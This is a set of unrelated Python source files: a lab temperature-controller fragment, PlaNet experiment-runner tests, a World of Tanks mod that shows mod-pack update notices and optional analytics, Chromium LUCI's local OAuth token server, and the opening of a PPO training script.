info(abs(self.get_lightwaveT() - self.get_set_lightwaveT()))
if value >= self.temperature_oasis_switch:
t_diff = 3.0
else:
t_diff = 3.0
timeout = abs(self.get_lightwaveT() - self.get_set_lightwaveT())*1.5
t1 = time()
while abs(self.get_lightwaveT() - self.get_set_lightwaveT()) > t_diff:
sleep(0.05)
if time() - t1 > timeout:
break
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
def set_PCOF(self,value):
from CA import caput, cawait
if self.get_PCOF() != value:
caput(self.lightwave_prefix + '.PCOF',value)
cawait(self.lightwave_prefix + '.PCOF')
def get_PCOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.PCOF')
return value
def set_ICOF(self,value):
from CA import caput, cawait
if self.get_ICOF() != value:
caput(self.lightwave_prefix + '.ICOF',value)
cawait(self.lightwave_prefix + '.ICOF')
def get_ICOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.ICOF')
return value
def set_DCOF(self,value):
from CA import caput,cawait
if self.get_DCOF() != value:
caput(self.lightwave_prefix + '.DCOF',value)
cawait(self.lightwave_prefix + '.DCOF')
def get_DCOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.DCOF')
return value
def set_PIDCOF(self,value):
from CA import caput,cawait
if self.get_PIDCOF() != value:
print('setting PIDCOF: %r -> %r' %(self.get_PIDCOF(),value))
caput(self.lightwave_prefix + '.PIDCOF',value)
cawait(self.lightwave_prefix + '.PIDCOF')
def get_PIDCOF(self):
from CA import caget
value = caget(self.lightwave_prefix + '.PIDCOF')
return value
def temp_to_oasis(self,T, mode = 'bistable'):
if mode == 'bistable':
if T >= self.temperature_oasis_switch:
t = self.temperature_oasis_limit_high
else:
t = self.idle_temperature_oasis
else:
oasis_min = t_min= self.idle_temperature_oasis
oasis_max = t_max = self.temperature_oasis_limit_high
T_max= 120.0
T_min= -16
            if T_min <= T <= T_max:
t = ((T-T_min)/(T_max-T_min))*(t_max-t_min) + t_min
elif T>T_max:
t = self.temperature_oasis_limit_high
elif T<T_min:
t = self.idle_temperature_oasis
if self.oasis_slave:
return round(t,1)
else:
return self.idle_temperature_oasis
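# Illustrative sketch (not part of the original module): in the default
# "bistable" mode temp_to_oasis() returns only one of two chiller set points,
# switching at temperature_oasis_switch. With the documented defaults
# (switch 83.0 C, high limit 45.0 C, idle 8.0 C, oasis_slave enabled) a
# request of 90 C maps to 45.0 and a request of 25 C maps to 8.0.
def _demo_temp_to_oasis(server):
    return server.temp_to_oasis(90.0), server.temp_to_oasis(25.0)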
temperature_server_IOC = Temperature_Server_IOC()
if __name__ == "__main__":
import logging
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(levelname)s %(module)s.%(funcName)s: %(message)s",
)
from timing_sequencer import timing_sequencer
print("timing_sequencer.queue_active = %r" % timing_sequencer.queue_active)
print("timing_sequencer.queue_active = False # cancel acquistion")
print("timing_sequencer.queue_active = True # simulate acquistion")
print("timing_sequencer.queue_repeat_count = 0 # restart acquistion")
print("timing_sequencer.queue_active = True # simulate acquistion")
print("self.start_time = time(); self.start_ramping()")
self = temperature_server_IOC
##from matplotlib import pyplot as plt
self.time_points = [0.0,30.0,302.0,332.0,634.0,30.0+634.0,302.0+634.0,332.0+634.0,634.0+634.0]
self.temp_points = [-16,-16,120,120,-16,-16,120,120,-16]
##print("self.lightwave_dl.driver.feedback_loop.PID = (1.0, 0.300000012, 0.561999977)")
##print('plt.plot(self.times,self.temperatures); plt.plot(self.oasis_times,self.oasis_temperatures); plt.show()')
##plt.plot(self.times,self.temperatures); plt.plot(self.oasis_times,self.oasis_temperatures); plt.show()
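    ## Illustrative only: 'times' expands time_points into steps of
    ## set_point_update_period and 'temperatures' interpolates temp_points onto
    ## that grid, e.g. time_points [0.0, 1.0] with a 0.5 s period -> [0.0, 0.5, 1.0].
    ##print('%d set points over %.1f s' % (len(self.times), self.times[-1]))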
|
test_running.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pickle
import threading
import time
import numpy as np
import tensorflow as tf
from planet.training import running
class TestExperiment(tf.test.TestCase):
def test_no_kills(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_no_kills')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/failed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def test_dying_workers(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_dying_workers')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_dying, args=(basedir, 15, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/FAIL'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(20, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def _worker_normal(basedir, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
for run in experiment:
for score in run:
pass
def _worker_dying(basedir, die_at_step, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
step = 0
for run in experiment:
for score in run:
step += 1
if step >= die_at_step:
return
def _start_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert not tf.gfile.Exists(os.path.join(logdir, 'started'))
assert not tf.gfile.Exists(os.path.join(logdir, 'resumed'))
with tf.gfile.GFile(os.path.join(logdir, 'started'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump([], file_)
return []
def _resume_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
with tf.gfile.GFile(os.path.join(logdir, 'resumed'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'rb') as file_:
numbers = pickle.load(file_)
if len(numbers) != 5:
raise Exception('Expected to be resumed in the middle for this test.')
return numbers
def _process_fn(logdir, numbers):
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
while len(numbers) < 10:
number = np.random.uniform(0, 0.1)
time.sleep(number)
numbers.append(number)
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump(numbers, file_)
yield number
if __name__ == '__main__':
tf.test.main()
|
mod_modPackInformer.py
|
# -*- coding: utf-8 -*-
import json
import os
import threading
import urllib
import urllib2
import BigWorld
import ResMgr
from gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID, ConfirmDialogButtons, SimpleDialogMeta
from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView
from gui import DialogsInterface, SystemMessages, makeHtmlString
from notification.NotificationListView import NotificationListView
from constants import AUTH_REALM
from helpers import getLanguageCode
from adisp import process
from gui.Scaleform.daapi.view.common.BaseTicker import BaseTicker
from helpers import dependency
from skeletons.gui.game_control import IBrowserController, IExternalLinksController
class Config(object):
def __init__(self):
self.data = {
'version' : '',
'name' : '',
'serverMain' : '',
'serverBackup' : '',
'statistic' : False,
'statisticTid' : '',
'openLinkInGameBrowser': False
}
xml = ResMgr.openSection('scripts/client/gui/mods/mod_modPackInformer.xml')
if xml is not None:
self.data['version'] = '%s' % xml.readString('version', '')
self.data['name'] = '%s' % xml.readString('name', '')
self.data['serverMain'] = '%s' % xml.readString('serverMain', '')
self.data['serverBackup'] = '%s' % xml.readString('serverBackup', '')
self.data['statistic'] = xml.readBool('statistic', False)
self.data['statisticTid'] = '%s' % xml.readString('statisticTid', '')
self.data['openLinkInGameBrowser'] = xml.readBool('openLinkInGameBrowser', False)
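# Illustrative sketch (not part of the original mod): the XML file read above
# is expected to provide the fields below; the root tag name and all values
# are assumptions for the example only.
#
#   <mod_modPackInformer.xml>
#       <version>1.0.0</version>
#       <name>MyModPack</name>
#       <serverMain>http://example.com/modpack.json</serverMain>
#       <serverBackup>http://backup.example.com/modpack.json</serverBackup>
#       <statistic>false</statistic>
#       <statisticTid>UA-XXXXXXXX-X</statisticTid>
#       <openLinkInGameBrowser>false</openLinkInGameBrowser>
#   </mod_modPackInformer.xml>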
class Updater(object):
def __init__(self):
self.show = True
self.count = 0
self.lin1 = ''
def start(self):
        if not self.show: return
try:
f = urllib2.urlopen(config.data['serverMain'])
except StandardError:
f = None
        if f is None or f.getcode() != 200:
try:
f = urllib2.urlopen(config.data['serverBackup'])
except StandardError:
f = None
        if f is not None and f.getcode() == 200:
mod_text = ''
json_text = json.loads(f.read().decode('utf-8-sig'))
if config.data['version'] != '%s' % json_text['version']:
self.show = False
if json_text['header']:
mod_text += '%s' % json_text['header'].format(**json_text)
if json_text['image']:
try:
image = 'img://gui/html/%s' % json_text['imageName']
path = os.path.realpath(os.path.join('./res/gui/html', '%s' % json_text['imageName']))
if not os.path.exists(path):
urllib.urlretrieve('%s' % json_text['imageLink'], path)
except StandardError:
image = ''
path = ''
if image and path and os.path.exists(path):
mod_text += '<br/><img src=\"%s\" width=\"%s\" height=\"%s\">' % (image, json_text['imageWidth'], json_text['imageHeight'])
if json_text['message']:
mod_text += '<br/>%s' % json_text['message'].format(**json_text)
self.lin1 = '%s' % json_text['link']
DialogsInterface.showDialog(SimpleDialogMeta(json_text['windowName'], mod_text, ConfirmDialogButtons(json_text['buttonNameOpen'], json_text['buttonNameClose']), None), self.click)
link = makeHtmlString('html_templates:lobby/system_messages', 'link', {
'text' : '%s' % json_text['messageLinkName'],
'linkType': '%s' % self.lin1
})
p__msg = '%s<br><br>' % json_text['header'].format(**json_text)
p__msg += '<font color="#E2D2A2" size="15"><b>%s</b></font>' % link
SystemMessages.pushMessage(p__msg, SystemMessages.SM_TYPE.GameGreeting)
def click(self, isConfirmed):
if isConfirmed and self.lin1:
if self.lin1.lower().startswith('http:') or self.lin1.lower().startswith('https:'):
if config.data['openLinkInGameBrowser']:
browser.open(self.lin1)
else:
BigWorld.wg_openWebBrowser(self.lin1)
def openLink(self, action):
if self.lin1 is None or self.lin1 == '': return
if self.lin1 in action:
self.click(True)
class Statistics(object):
def __init__(self):
self.analytics_started = False
self.thread_analytics = None
self.user = None
self.old_user = None
def analytics_start(self):
if not self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'start'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
self.old_user = BigWorld.player().databaseID
def start(self):
player = BigWorld.player()
if self.user and self.user != player.databaseID:
self.old_user = player.databaseID
self.thread_analytics = threading.Thread(target=self.end, name='Thread')
self.thread_analytics.start()
self.user = player.databaseID
self.thread_analytics = threading.Thread(target=self.analytics_start, name='Thread')
self.thread_analytics.start()
def end(self):
if self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'end'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = False
class p__Browser(BaseTicker):
externalBrowser = dependency.descriptor(IExternalLinksController)
internalBrowser = dependency.descriptor(IBrowserController)
def __init__(self):
super(p__Browser, self).__init__()
self.__browserID = 'modPackInformer'
return
def _dispose(self):
self.__browserID = 'modPackInformer'
super(p__Browser, self)._dispose()
return
def open(self, link, internal=True):
if internal:
if self.internalBrowser is not None:
self.__showInternalBrowser(link)
else:
self.__showExternalBrowser(link)
else:
self.__showExternalBrowser(link)
return
@process
def __showInternalBrowser(self, link):
self.__browserID = yield self.internalBrowser.load(url=link, browserID=self.__browserID)
def __showExternalBrowser(self, link):
if self.externalBrowser is not None:
self.externalBrowser.open(link)
def hookedGetLabels(self):
return [{
'id' : DIALOG_BUTTON_ID.SUBMIT,
'label' : self._submit,
'focused': True
}, {
'id' : DIALOG_BUTTON_ID.CLOSE,
'label' : self._close,
'focused': False
}]
def hookedLobbyPopulate(self):
hookLobbyPopulate(self)
start = threading.Thread(target=updater.start, name='updater.start')
start.start()
if config.data['statistic']:
stat.start()
def hookedOnClickAction(*args):
updater.openLink(args[3])
hookOnClickAction(*args)
def init():
print '[LOAD_MOD]: [modPackInformer, by spoter]'
def fini():
stat.end()
config = Config()
browser = p__Browser()
updater = Updater()
stat = Statistics()
ConfirmDialogButtons.getLabels = hookedGetLabels
hookLobbyPopulate = LobbyView._populate
LobbyView._populate = hookedLobbyPopulate
hookOnClickAction = NotificationListView.onClickAction
NotificationListView.onClickAction = hookedOnClickAction
|
auth_server.py
|
#!/usr/bin/env python
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import base64
import collections
import http.server
import json
import logging
import os
import re
import socketserver
import sys
import threading
import time
# Access or ID token with its expiration time.
AccessToken = collections.namedtuple('AccessToken', [
'access_token', # urlsafe str with the token
'expiry', # expiration time as unix timestamp in seconds
])
class TokenError(Exception):
"""Raised by TokenProvider if the token can't be created (fatal error).
See TokenProvider docs for more info.
"""
def __init__(self, code, msg):
super(TokenError, self).__init__(msg)
self.code = code
class RPCError(Exception):
"""Raised by LocalAuthServer RPC handlers to reply with HTTP error status."""
def __init__(self, code, msg):
super(RPCError, self).__init__(msg)
self.code = code
# Account describes one logical account.
Account = collections.namedtuple('Account', ['id', 'email'])
class TokenProvider:
"""Interface for an object that can create OAuth or ID tokens on demand.
Defined as a concrete class only for documentation purposes.
"""
def generate_access_token(self, account_id, scopes):
"""Generates a new access token with given scopes.
Will be called from multiple threads (possibly concurrently) whenever
LocalAuthServer needs to refresh a token with particular scopes.
Can raise RPCError exceptions. They will be immediately converted to
corresponding RPC error replies (e.g. HTTP 500). This is appropriate for
low-level or transient errors.
Can also raise TokenError. It will be converted to an RPC reply with
non-zero error_code. It will also be cached, so that the provider would
never be called again for the same set of scopes. This is appropriate for
high-level fatal errors.
Returns AccessToken on success.
"""
raise NotImplementedError()
def generate_id_token(self, account_id, audience):
"""Generates a new ID token with the given audience.
Behaves similarly to generate_access_token, just produces different sort
of tokens.
"""
raise NotImplementedError()
class LocalAuthServer:
"""LocalAuthServer handles /rpc/LuciLocalAuthService.* requests.
It exposes an HTTP JSON RPC API that is used by task processes to grab an
access token for the service account associated with the task.
It implements RPC handling details and in-memory cache for the tokens, but
defers to the supplied TokenProvider for the actual token generation.
"""
def __init__(self):
self._lock = threading.Lock() # guards everything below
self._accept_thread = None
self._cache = {} # see get_cached_token
self._token_provider = None
self._accounts = frozenset() # set of Account tuples
self._rpc_secret = None
self._server = None
def start(self, token_provider, accounts, default_account_id, port=0):
"""Starts the local auth RPC server on some 127.0.0.1 port.
Args:
token_provider: instance of TokenProvider to use for making tokens.
accounts: a list of Account tuples to allow getting a token for.
default_account_id: goes directly into LUCI_CONTEXT['local_auth'].
port: local TCP port to bind to, or 0 to bind to any available port.
Returns:
A dict to put into 'local_auth' section of LUCI_CONTEXT.
"""
assert all(isinstance(acc, Account) for acc in accounts), accounts
# 'default_account_id' is either not set, or one of the supported accounts.
assert (
not default_account_id or
any(default_account_id == acc.id for acc in accounts))
server = _HTTPServer(self, ('127.0.0.1', port))
# This secret will be placed in a file on disk accessible only to current
# user processes. RPC requests are expected to send this secret verbatim.
# That way we authenticate RPCs as coming from current user's processes.
rpc_secret = base64.b64encode(os.urandom(48)).decode('ascii')
with self._lock:
assert not self._server, 'Already running'
logging.info('Local auth server: http://127.0.0.1:%d', server.server_port)
self._token_provider = token_provider
self._accounts = frozenset(accounts)
self._rpc_secret = rpc_secret
self._server = server
self._accept_thread = threading.Thread(target=self._server.serve_forever)
self._accept_thread.start()
local_auth = {
'rpc_port':
self._server.server_port,
'secret':
self._rpc_secret,
'accounts': [{
'id': acc.id,
'email': acc.email
} for acc in sorted(accounts)],
}
# TODO(vadimsh): Some clients don't understand 'null' value for
# default_account_id, so just omit it completely for now.
if default_account_id:
local_auth['default_account_id'] = default_account_id
return local_auth
def stop(self):
"""Stops the server and resets the state."""
with self._lock:
if not self._server:
return
server, self._server = self._server, None
thread, self._accept_thread = self._accept_thread, None
self._token_provider = None
self._accounts = frozenset()
self._rpc_secret = None
self._cache.clear()
logging.debug('Stopping the local auth server...')
server.shutdown()
thread.join()
server.server_close()
logging.info('The local auth server is stopped')
def handle_rpc(self, method, request):
"""Called by _RequestHandler to handle one RPC call.
Called from internal server thread. May be called even if the server is
already stopped (due to http.server.HTTPServer implementation that
stupidly leaks handler threads).
Args:
method: name of the invoked RPC method, e.g. "GetOAuthToken".
request: JSON dict with the request body.
Returns:
JSON dict with the response body.
Raises:
RPCError to return non-200 HTTP code and an error message as plain text.
"""
if method == 'GetOAuthToken':
return self.handle_get_oauth_token(request)
if method == 'GetIDToken':
return self.handle_get_id_token(request)
raise RPCError(404, 'Unknown RPC method "%s".' % method)
### RPC method handlers. Called from internal threads.
def handle_get_oauth_token(self, request):
"""Returns an OAuth token representing the task service account.
The returned token is usable for at least 1 min.
Request body:
{
"account_id": <str>,
"scopes": [<str scope1>, <str scope2>, ...],
"secret": <str from LUCI_CONTEXT.local_auth.secret>
}
Response body:
{
"error_code": <int, 0 or missing on success>,
"error_message": <str, optional>,
"access_token": <str with actual token (on success)>,
"expiry": <int with unix timestamp in seconds (on success)>
}
"""
# Validate 'account_id' and 'secret'. 'account_id' is the logical account to
# get a token for (e.g. "task" or "system").
account_id = self.check_account_and_secret(request)
# Validate scopes. It is conceptually a set, so remove duplicates.
scopes = request.get('scopes')
if not scopes:
raise RPCError(400, 'Field "scopes" is required.')
if (not isinstance(scopes, list)
or not all(isinstance(s, str) for s in scopes)):
raise RPCError(400, 'Field "scopes" must be a list of strings.')
scopes = tuple(sorted(set(map(str, scopes))))
# Get the cached token or generate a new one.
tok_or_err = self.get_cached_token(
cache_key=('access_token', account_id, scopes),
refresh_callback=lambda p: p.generate_access_token(account_id, scopes))
# Done.
if isinstance(tok_or_err, AccessToken):
return {
'access_token': tok_or_err.access_token,
'expiry': int(tok_or_err.expiry),
}
if isinstance(tok_or_err, TokenError):
return {
'error_code': tok_or_err.code,
'error_message': str(tok_or_err) or 'unknown',
}
raise AssertionError('impossible')
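  # Illustrative request for the handler above (all values are placeholders;
  # the real port and secret come from LUCI_CONTEXT['local_auth']):
  #
  #   POST /rpc/LuciLocalAuthService.GetOAuthToken HTTP/1.1
  #   Content-Type: application/json
  #
  #   {"account_id": "task",
  #    "scopes": ["https://www.googleapis.com/auth/userinfo.email"],
  #    "secret": "<LUCI_CONTEXT.local_auth.secret>"}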
def handle_get_id_token(self, request):
"""Returns an ID token representing the task service account.
The returned token is usable for at least 1 min.
Request body:
{
"account_id": <str>,
"audience": <str>,
"secret": <str from LUCI_CONTEXT.local_auth.secret>
}
Response body:
{
"error_code": <int, 0 or missing on success>,
"error_message": <str, optional>,
"id_token": <str with actual token (on success)>,
"expiry": <int with unix timestamp in seconds (on success)>
}
"""
# Validate 'account_id' and 'secret'. 'account_id' is the logical account to
# get a token for (e.g. "task" or "system").
account_id = self.check_account_and_secret(request)
# An audience is a string and it is required.
audience = request.get('audience')
if not audience:
raise RPCError(400, 'Field "audience" is required.')
if not isinstance(audience, str):
raise RPCError(400, 'Field "audience" must be a string.')
audience = str(audience)
# Get the cached token or generate a new one.
tok_or_err = self.get_cached_token(
cache_key=('id_token', account_id, audience),
refresh_callback=lambda p: p.generate_id_token(account_id, audience))
# Done.
if isinstance(tok_or_err, AccessToken):
return {
'id_token': tok_or_err.access_token,
'expiry': int(tok_or_err.expiry),
}
if isinstance(tok_or_err, TokenError):
return {
'error_code': tok_or_err.code,
'error_message': str(tok_or_err) or 'unknown',
}
raise AssertionError('impossible')
### Utilities used by RPC handlers. Called from internal threads.
def check_account_and_secret(self, request):
"""Checks 'account_id' and 'secret' fields of the request.
Returns:
Validated account_id.
Raises:
RPCError on validation errors.
"""
# Logical account to get a token for (e.g. "task" or "system").
account_id = request.get('account_id')
if not account_id:
raise RPCError(400, 'Field "account_id" is required.')
if not isinstance(account_id, str):
raise RPCError(400, 'Field "account_id" must be a string')
account_id = str(account_id)
# Validate the secret format.
secret = request.get('secret')
if not secret:
raise RPCError(400, 'Field "secret" is required.')
if not isinstance(secret, str):
raise RPCError(400, 'Field "secret" must be a string.')
secret = str(secret)
# Grab the state from the lock-guarded area.
with self._lock:
if not self._server:
raise RPCError(503, 'Stopped already.')
rpc_secret = self._rpc_secret
accounts = self._accounts
# Use constant time check to prevent malicious processes from discovering
# the secret byte-by-byte measuring response time.
if not constant_time_equals(secret, rpc_secret):
raise RPCError(403, 'Invalid "secret".')
# Make sure we know about the requested account.
if not any(account_id == acc.id for acc in accounts):
raise RPCError(404, 'Unrecognized account ID %r.' % account_id)
return account_id
def get_cached_token(self, cache_key, refresh_callback):
"""Grabs a token from the cache, refreshing it if necessary.
Cache keys have two forms:
* ('access_token', account_id, tuple of scopes) - for access tokens.
* ('id_token', account_id, audience) - for ID tokens.
Args:
cache_key: a tuple with the cache key identifying the token.
refresh_callback: will be called as refresh_callback(token_provider) to
refresh the token if the cached one has expired. Must return
AccessToken or raise TokenError.
Returns:
Either AccessToken or TokenError.
Raises:
RPCError on internal errors.
"""
# Grab the token (or a fatal error) from the memory cache, check token's
# expiration time. Grab _token_provider while we are holding the lock.
with self._lock:
if not self._server:
raise RPCError(503, 'Stopped already.')
tok_or_err = self._cache.get(cache_key)
if isinstance(tok_or_err, TokenError):
return tok_or_err # cached fatal error
if isinstance(tok_or_err, AccessToken) and not should_refresh(tok_or_err):
return tok_or_err # an up-to-date token
# Here tok_or_err is either None or a stale AccessToken. We'll refresh it.
token_provider = self._token_provider
# Do the refresh outside of the RPC server lock to unblock other clients
# that are hitting the cache. The token provider should implement its own
# synchronization.
try:
tok_or_err = refresh_callback(token_provider)
assert isinstance(tok_or_err, AccessToken), tok_or_err
except TokenError as exc:
tok_or_err = exc
# Cache the token or fatal errors (to avoid useless retry later).
with self._lock:
if not self._server:
raise RPCError(503, 'Stopped already.')
self._cache[cache_key] = tok_or_err
return tok_or_err
def constant_time_equals(a, b):
"""Compares two strings in constant time regardless of theirs content."""
if len(a) != len(b):
return False
result = 0
for x, y in zip(a, b):
result |= ord(x) ^ ord(y)
return result == 0
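# Note: the standard library's hmac.compare_digest provides an equivalent
# constant-time comparison and could be used instead, e.g.:
#   import hmac
#   hmac.compare_digest(secret, rpc_secret)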
def should_refresh(tok):
"""Returns True if the token must be refreshed because it expires soon."""
# LUCI_CONTEXT protocol requires that returned tokens are alive for at least
# 2.5 min. See LUCI_CONTEXT.md. Add 30 sec extra of leeway.
return time.time() > tok.expiry - 3*60
class _HTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
"""Used internally by LocalAuthServer."""
# How often to poll 'select' in local HTTP server.
#
# Defines minimal amount of time 'stop' would block. Overridden in tests to
# speed them up.
poll_interval = 0.5
# From socketserver.ThreadingMixIn.
daemon_threads = True
# From http.server.HTTPServer.
request_queue_size = 50
def __init__(self, local_auth_server, addr):
http.server.HTTPServer.__init__(self, addr, _RequestHandler)
self.local_auth_server = local_auth_server
def serve_forever(self, poll_interval=None):
"""Overrides default poll interval."""
http.server.HTTPServer.serve_forever(self, poll_interval
or self.poll_interval)
def handle_error(self, _request, _client_address):
"""Overrides default handle_error that dumbs stuff to stdout."""
logging.exception('local auth server: Exception happened')
ERROR_MESSAGE = """\
Error code: %(code)d
Message: %(message)s
Explanation: %(explain)s
"""
class _RequestHandler(http.server.BaseHTTPRequestHandler):
"""Used internally by LocalAuthServer.
Parses the request, serializes and write the response.
"""
# Buffer the reply, no need to send each line separately.
wbufsize = -1
# Overrides to send 'text/plain' error response.
error_message_format = ERROR_MESSAGE
error_content_type = 'text/plain;charset=utf-8'
def log_message(self, fmt, *args): # pylint: disable=arguments-differ
"""Overrides default log_message to not abuse stderr."""
logging.debug('local auth server: ' + fmt, *args)
def do_POST(self):
"""Implements POST handler."""
# Parse URL to extract method name.
m = re.match(r'^/rpc/LuciLocalAuthService\.([a-zA-Z0-9_]+)$', self.path)
if not m:
self.send_error(404, 'Expecting /rpc/LuciLocalAuthService.*')
return
method = m.group(1)
# The request body MUST be JSON. Ignore charset, we don't care.
ct = self.headers.get('content-type')
if not ct or ct.split(';')[0] != 'application/json':
self.send_error(
400, 'Expecting "application/json" Content-Type, got %r' % ct)
return
    # Read the body. Chunked transfer encoding or compression is not supported.
try:
content_len = int(self.headers['content-length'])
except ValueError:
      self.send_error(400, 'Missing or invalid Content-Length header')
return
try:
req = json.loads(self.rfile.read(content_len))
except ValueError as exc:
self.send_error(400, 'Not a JSON: %s' % exc)
return
if not isinstance(req, dict):
self.send_error(400, 'Not a JSON dictionary')
return
# Let the LocalAuthServer handle the request. Prepare the response body.
try:
resp = self.server.local_auth_server.handle_rpc(method, req)
response_body = json.dumps(resp) + '\n'
except RPCError as exc:
self.send_error(exc.code, str(exc))
return
except Exception as exc:
self.send_error(500, 'Internal error: %s' % exc)
return
# Send the response.
self.send_response(200)
self.send_header('Connection', 'close')
self.send_header('Content-Length', str(len(response_body)))
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(response_body.encode('utf-8'))
def testing_main():
"""Launches a local HTTP auth service and waits for Ctrl+C.
Useful during development and manual testing.
"""
# Don't mess with sys.path outside of adhoc testing.
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from libs import luci_context
logging.basicConfig(level=logging.DEBUG)
class DumbProvider:
def generate_access_token(self, account_id, scopes):
logging.info('generate_access_token(%r, %r) called', account_id, scopes)
return AccessToken('fake_access_tok_%s' % account_id, time.time() + 300)
def generate_id_token(self, account_id, audience):
logging.info('generate_id_token(%r, %r) called', account_id, audience)
return AccessToken('fake_id_tok_%s' % account_id, time.time() + 300)
server = LocalAuthServer()
ctx = server.start(
token_provider=DumbProvider(),
accounts=[
Account('a', 'a@example.com'),
Account('b', 'b@example.com'),
Account('c', 'c@example.com'),
],
default_account_id='a',
port=11111)
try:
with luci_context.write(local_auth=ctx):
print('Copy-paste this into another shell:')
print('export LUCI_CONTEXT=%s' % os.getenv('LUCI_CONTEXT'))
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
finally:
server.stop()
if __name__ == '__main__':
testing_main()
|
train.py
|
#! /usr/bin/env python3
"""
PPO: Proximal Policy Optimization
Written by Patrick Coady (pat-coady.github.io)
Modified by Tin-Yin Lai (wu6u3) into asynchronous version
PPO uses a loss function and gradient descent to approximate
Trust Region Policy Optimization (TRPO). See these papers for
details:
TRPO / PPO:
https://arxiv.org/pdf/1502.05477.pdf (Schulman et al., 2016)
Distributed PPO:
https://arxiv.org/abs/1707.02286 (Heess et al., 2017)
Generalized Advantage Estimation:
https://arxiv.org/pdf/1506.02438.pdf
And, also, this GitHub repo which was helpful to me during
implementation:
https://github.com/joschu/modular_rl
This implementation learns policies for continuous environments
in the OpenAI Gym (https://gym.openai.com/). Testing was focused on
the MuJoCo control tasks.
"""
import gym
import numpy as np
from gym import wrappers
from thread_policy import Policy
from value_function import NNValueFunction
import scipy.signal
from utils import Logger, Scaler
from datetime import datetime
import os
import argparse
